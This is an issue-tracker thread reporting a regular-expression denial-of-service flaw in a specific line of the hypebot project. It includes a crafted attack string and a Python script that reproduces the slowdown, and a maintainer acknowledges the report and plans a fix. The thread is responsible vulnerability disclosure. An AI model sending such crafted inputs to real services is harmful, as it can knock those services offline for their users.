Vulnerable Regular Expression in hypebot

[yetingli]

Type of Issue Potential Regex Denial of Service (ReDoS)

Description The vulnerable regular expression is located in

https://github.com/google/hypebot/blob/dd500026438af2d1154c26ba0201fa22e4c3280e/hypebot/basebot.py#L248

The ReDOS vulnerability can be exploited with the following string $(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!

You can execute the following code to reproduce ReDos

    import re
    from time import perf_counter
    REGEX = re.compile('\$\(([^\(\)]+(?:[^\(\)]*".*?"[^\(\)]*)*)\)')
    ATTACK = '$(!!:"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":"":""!'
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    print(REGEX.search(ATTACK))
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")

I think you can limit the input length or modify this regex.

[brcooley]

Thanks @yetingli for the report, I just wanted to follow-up here to let you know we're looking into fixing this issue now.